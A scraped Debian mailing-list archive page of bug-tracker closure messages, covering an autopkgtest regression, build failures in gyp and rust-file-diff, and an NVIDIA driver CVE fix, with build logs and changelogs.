/usr/share/dokuwiki/inc/Search/Indexer.php on line 1070, referer: http://wiki.potorti.it/egc2018/bilancio And unfortunately email sending still does not work: emails are sent with an empty From: field, so they fail at the sendmail level.
Bug#1004506: marked as done (muscle breaks theseus autopkgtest: Unknown option maxiters)
Your message dated Mon, 07 Feb 2022 12:05:31 + with message-id and subject line Bug#1004506: fixed in theseus 3.3.0-11 has caused the Debian Bug report #1004506, regarding muscle breaks theseus autopkgtest: Unknown option maxiters to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1004506: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1004506 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: muscle, theseus Control: found -1 muscle/1:5.1-1 Control: found -1 theseus/3.3.0-10 Severity: serious Tags: sid bookworm X-Debbugs-CC: debian...@lists.debian.org User: debian...@lists.debian.org Usertags: breaks needs-update Dear maintainer(s), With a recent upload of muscle the autopkgtest of theseus fails in testing when that autopkgtest is run with the binary packages of muscle from unstable. It passes when run with only packages from testing. In tabular form: passfail muscle from testing1:5.1-1 theseusfrom testing3.3.0-10 all others from testingfrom testing I copied some of the output at the bottom of this report. Currently this regression is blocking the migration of muscle to testing [1]. Due to the nature of this issue, I filed this bug report against both packages. Can you please investigate the situation and reassign the bug to the right package? More information about this bug and the reason for filing it can be found on https://wiki.debian.org/ContinuousIntegration/RegressionEmailInformation Paul [1] https://qa.debian.org/excuses.php?package=muscle https://ci.debian.net/data/autopkgtest/testing/amd64/t/theseus/18786643/log.gz [1;31m< BEGIN THESEUS 3.3.0 >[0m I===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-=I I[1;36mTHESEUS[0m: Maximum likelihood multiple superpositioningI I=-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===I Detected 48 CPUs ... Reading pdb file ... Successfully read 10 models and/or structures Selecting coordinates for superposition ... Calculating superposition transformations ... Calculating statistics ... Calculating likelihood statistics ... 10 models superimposed in 2.1 ms * Classical LS pairwise 1.87300 * Least-squares0.72541 * Maximum Likelihood 0.39551 ~ Marginal Log Likelihood-4487.32 ~ AIC-5223.64 ~ BIC-7333.12 + Omnibus chi^2 0.95 (P:9.98e-01) + Hierarchical var (2.34e-01, 1.50e+00) chi^20.76 (P:7.91e-01) + Rotational, translational, covar chi^2 0.95 (P:9.98e-01) + Hierarchical minimum var (sigma) 1.34e-02 (1.16e-01) < skewness 0.03 (P:3.00e-01) < skewness Z-value 1.04 < kurtosis 0.16 (P:1.28e-02) < kurtosis Z-value 2.49 * Data pts = 5940, Free params = 655, D/P = 9.1* Median structure = #8 * N(total) = 1980, N(atoms) = 198, N(structures) = 10 Total rounds = 15 Converged to a fractional precision of 5.2e-08 I===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-==I Transforming coordinates ... Writing transformations file ... Writing transformed coordinates PDB file ... Writing average coordinate file ... Done. I===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-==I [1;31m< END THESEUS 3.3.0 >[0m [1;31m< BEGIN THESEUS 3.3.0 >[0m I===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-=I I[1;36mTHESEUS[0m: Maximum likelihood multiple superpositioningI I=-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===-===I Detected 48 CPUs ... Reading 10 pdb files ... Successfully read 10 models and/or structures Reading multiple sequence alignment ... Calculating superposition transformations ... Calculating statistics ... Calculating likelihood statistics ... 10 models superimposed in 2.2 ms * Classical LS pairwise 0.80299 * Least-squares0.32968 * Maximum Likelihood 0.21859 ~
Bug#1002190: marked as done (gyp: FTBFS: dh_auto_test: error: pybuild --test -i python{version} -p "3.10 3.9" returned exit code 13)
Your message dated Mon, 07 Feb 2022 11:34:59 + with message-id and subject line Bug#1002190: fixed in gyp 0.1+20210831gitd6c5dd5-2 has caused the Debian Bug report #1002190, regarding gyp: FTBFS: dh_auto_test: error: pybuild --test -i python{version} -p "3.10 3.9" returned exit code 13 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1002190: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1002190 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: gyp Version: 0.1+20210831gitd6c5dd5-1 Severity: serious Justification: FTBFS Tags: bookworm sid ftbfs User: lu...@debian.org Usertags: ftbfs-20211220 ftbfs-bookworm Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part (hopefully): > make[1]: Entering directory '/<>' > dh_auto_build > I: pybuild base:237: /usr/bin/python3.10 setup.py build > running build > running build_py > creating /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/__init__.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/xcode_ninja.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/simple_copy.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/ninja_syntax.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/common_test.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/win_tool.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/input.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/MSVSProject.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/xml_fix.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/MSVSUtil.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/mac_tool.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/flock_tool.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/xcodeproj_file.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/input_test.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/easy_xml_test.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/msvs_emulation.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/xcode_emulation.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/common.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/MSVSUserFile.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/easy_xml.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/MSVSSettings.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/MSVSVersion.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/MSVSToolFile.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/MSVSSettings_test.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > copying pylib/gyp/MSVSNew.py -> > /<>/.pybuild/cpython3_3.10/build/gyp > creating /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/__init__.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/xcode_test.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/msvs_test.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/msvs.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/ninja_test.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/gypsh.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/analyzer.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/xcode.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/make.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/gypd.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/dump_dependency_json.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/eclipse.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/ninja.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > copying pylib/gyp/generator/cmake.py -> > /<>/.pybuild/cpython3_3.10/build/gyp/generator > I: pybuild base:237: /usr/bin/python3 setup.py build > running build > running build_py > creating /<>/.pybuild/cpython3_3.9/build/gyp > copying pylib/gyp/__init__.py -> > /<>/.pybuild/cpython3_3.9/build/gyp > copying pylib/gyp/xcode_ninja.py -> > /<>/.pybuild/cpython3_3.9/build/gyp > copying
Bug#1004847: marked as done (nvidia-graphics-drivers: CVE-2022-21813, CVE-2022-21814)
Your message dated Mon, 07 Feb 2022 11:19:33 + with message-id and subject line Bug#1004847: fixed in nvidia-graphics-drivers 510.47.03-1 has caused the Debian Bug report #1004847, regarding nvidia-graphics-drivers: CVE-2022-21813, CVE-2022-21814 to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1004847: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1004847 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: nvidia-graphics-drivers Severity: serious Tags: security upstream Control: clone -1 -2 -3 -4 -5 -6 -7 Control: reassign -2 src:nvidia-graphics-drivers-legacy-340xx 340.76-6 Control: retitle -2 nvidia-graphics-drivers-legacy-340xx: CVE-2022-21813, CVE-2022-21814 Control: tag -2 + wontfix Control: reassign -3 src:nvidia-graphics-drivers-legacy-390xx 390.48-4 Control: retitle -3 nvidia-graphics-drivers-legacy-390xx: CVE-2022-21813, CVE-2022-21814 Control: reassign -4 src:nvidia-graphics-drivers-tesla-418 418.87.01-1 Control: retitle -4 nvidia-graphics-drivers-tesla-418: CVE-2022-21813, CVE-2022-21814 Control: reassign -5 src:nvidia-graphics-drivers-tesla-450 450.51.05-1 Control: retitle -5 nvidia-graphics-drivers-tesla-450: CVE-2022-21813, CVE-2022-21814 Control: reassign -6 src:nvidia-graphics-drivers-tesla-460 460.32.03-1 Control: retitle -6 nvidia-graphics-drivers-tesla-460: CVE-2022-21813, CVE-2022-21814 Control: reassign -7 src:nvidia-graphics-drivers-tesla-470 470.57.02-1 Control: retitle -7 nvidia-graphics-drivers-tesla-470: CVE-2022-21813, CVE-2022-21814 Control: found -1 340.24-1 Control: found -1 343.22-1 Control: found -1 396.18-1 Control: found -1 430.14-1 Control: found -1 450.51-1 Control: found -1 455.23.04-1 Control: found -1 465.24.02-1 Control: found -1 495.44-1 https://nvidia.custhelp.com/app/answers/detail/a_id/5312 CVE‑2022‑21813 NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel driver, where improper handling of insufficient permissions or privileges may allow an unprivileged local user limited write access to protected memory, which can lead to denial of service. CVE‑2022‑21814 NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel driver package, where improper handling of insufficient permissions or privileges may allow an unprivileged local user limited write access to protected memory, which can lead to denial of service. Driver Branch CVE IDs Addressed R510, R470 CVE-2022-21813, CVE-2022-21814 Andreas --- End Message --- --- Begin Message --- Source: nvidia-graphics-drivers Source-Version: 510.47.03-1 Done: Andreas Beckmann We believe that the bug you reported is fixed in the latest version of nvidia-graphics-drivers, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1004...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Andreas Beckmann (supplier of updated nvidia-graphics-drivers package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Format: 1.8 Date: Mon, 07 Feb 2022 11:45:15 +0100 Source: nvidia-graphics-drivers Architecture: source Version: 510.47.03-1 Distribution: experimental Urgency: medium Maintainer: Debian NVIDIA Maintainers Changed-By: Andreas Beckmann Closes: 1004847 Changes: nvidia-graphics-drivers (510.47.03-1) experimental; urgency=medium . * New upstream production branch release 510.47.03 (2022-02-01). * Fixed CVE‑2022‑21813, CVE‑2022‑21814. (Closes: #1004847) https://nvidia.custhelp.com/app/answers/detail/a_id/5312 - Added support for Vulkan 1.3. * New upstream beta 510.39.01 (2022-01-11). - Added a new daemon, nvidia-powerd, to provide support for the Dynamic Boost feature on supported systems. Dynamic Boost balances power between the CPU and the GPU for improved performance. For more details, see the "Dynamic Boost on Linux" chapter in the README. - Updated nvidia-bug-report.sh to search the systemd journal for nvidia-powerd logs. - Fixed several issues which caused the supported-gpus.json file to contain incorrect product information. - Added a new module parameter, "peerdirect_support", to
Bug#990382: marked as done (rust-file-diff FTBFS)
Your message dated Mon, 07 Feb 2022 10:34:46 + with message-id and subject line Bug#990382: fixed in rust-file-diff 1.0.0-2 has caused the Debian Bug report #990382, regarding rust-file-diff FTBFS to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 990382: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=990382 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems --- Begin Message --- Source: rust-file-diff Version: 1.0.0-1 Severity: serious Tags: ftbfs https://tests.reproducible-builds.org/debian/rb-pkg/unstable/amd64/rust-file-diff.html ... dh_shlibdeps -O--buildsystem=cargo dpkg-shlibdeps: error: cannot find library libglib-2.0.so.0 needed by debian/librust-file-diff-dev/usr/share/cargo/registry/file_diff-1.0.0/testdata/c_hello_copy (ELF format: 'elf64-x86-64' abi: '0201003e'; RPATH: '') dpkg-shlibdeps: error: cannot find library libglib-2.0.so.0 needed by debian/librust-file-diff-dev/usr/share/cargo/registry/file_diff-1.0.0/testdata/c_hello (ELF format: 'elf64-x86-64' abi: '0201003e'; RPATH: '') dpkg-shlibdeps: warning: package could avoid a useless dependency if debian/librust-file-diff-dev/usr/share/cargo/registry/file_diff-1.0.0/testdata/rust_hello was not linked against libdl.so.2 (it uses none of the library's symbols) dpkg-shlibdeps: warning: package could avoid a useless dependency if debian/librust-file-diff-dev/usr/share/cargo/registry/file_diff-1.0.0/testdata/rust_hello was not linked against librt.so.1 (it uses none of the library's symbols) dpkg-shlibdeps: warning: package could avoid a useless dependency if debian/librust-file-diff-dev/usr/share/cargo/registry/file_diff-1.0.0/testdata/rust_hello was not linked against libm.so.6 (it uses none of the library's symbols) dpkg-shlibdeps: error: cannot continue due to the errors listed above Note: libraries are not searched in other binary packages that do not have any shlibs or symbols file. To help dpkg-shlibdeps find private libraries, you might need to use -l. dh_shlibdeps: error: dpkg-shlibdeps -Tdebian/librust-file-diff-dev.substvars debian/librust-file-diff-dev/usr/share/cargo/registry/file_diff-1.0.0/testdata/c_hello debian/librust-file-diff-dev/usr/share/cargo/registry/file_diff-1.0.0/testdata/c_hello_copy debian/librust-file-diff-dev/usr/share/cargo/registry/file_diff-1.0.0/testdata/rust_hello returned exit code 2 dh_shlibdeps: error: Aborting due to earlier error make: *** [debian/rules:6: binary] Error 25 --- End Message --- --- Begin Message --- Source: rust-file-diff Source-Version: 1.0.0-2 Done: Dylan Aïssi We believe that the bug you reported is fixed in the latest version of rust-file-diff, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 990...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Dylan Aïssi (supplier of updated rust-file-diff package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Format: 1.8 Date: Mon, 07 Feb 2022 11:12:13 +0100 Source: rust-file-diff Architecture: source Version: 1.0.0-2 Distribution: unstable Urgency: medium Maintainer: Debian Rust Maintainers Changed-By: Dylan Aïssi Closes: 990382 Changes: rust-file-diff (1.0.0-2) unstable; urgency=medium . * Team upload. * Do not install x86_64 binaries without source code, and skip tests using them (Closes: #990382), as they fail on non x86-64. * Package file_diff 1.0.0 from crates.io using debcargo 2.5.0 Checksums-Sha1: 5da149538ba3a18bf97b69a23b8cae6841c6aee7 2211 rust-file-diff_1.0.0-2.dsc fd5bfb95577e95a3a2d6e3b2e89db8ee137641b7 3316 rust-file-diff_1.0.0-2.debian.tar.xz 5770c34d603148188a4a87ecf3668566291e4677 7219 rust-file-diff_1.0.0-2_source.buildinfo Checksums-Sha256: a9991790ed8009c05068670c7d1669038c7fc1a43957bd1964195d2dbe34fc1e 2211 rust-file-diff_1.0.0-2.dsc cd3a29c388cdee42473de835f811e048364a21b6e1a0d191c32fbfcc9bf2329c 3316 rust-file-diff_1.0.0-2.debian.tar.xz de719dede106b6b6a30ba8a56e104a7244d0ccf3fd6dae7c534fb1133bd6c197 7219 rust-file-diff_1.0.0-2_source.buildinfo Files: 4123661627432fdac44fb74a1238054a 2211 rust optional rust-file-diff_1.0.0-2.dsc 0d4bfa28dbda73e5aeece4d83ecf1aea 3316 rust optional
Processed: tagging 965459
Processing commands for cont...@bugs.debian.org: > tags 965459 + pending Bug #965459 [src:coinor-ipopt] coinor-ipopt: Removal of obsolete debhelper compat 5 and 6 in bookworm Added tag(s) pending. > thanks Stopping processing here. Please contact me if you need assistance. -- 965459: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=965459 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems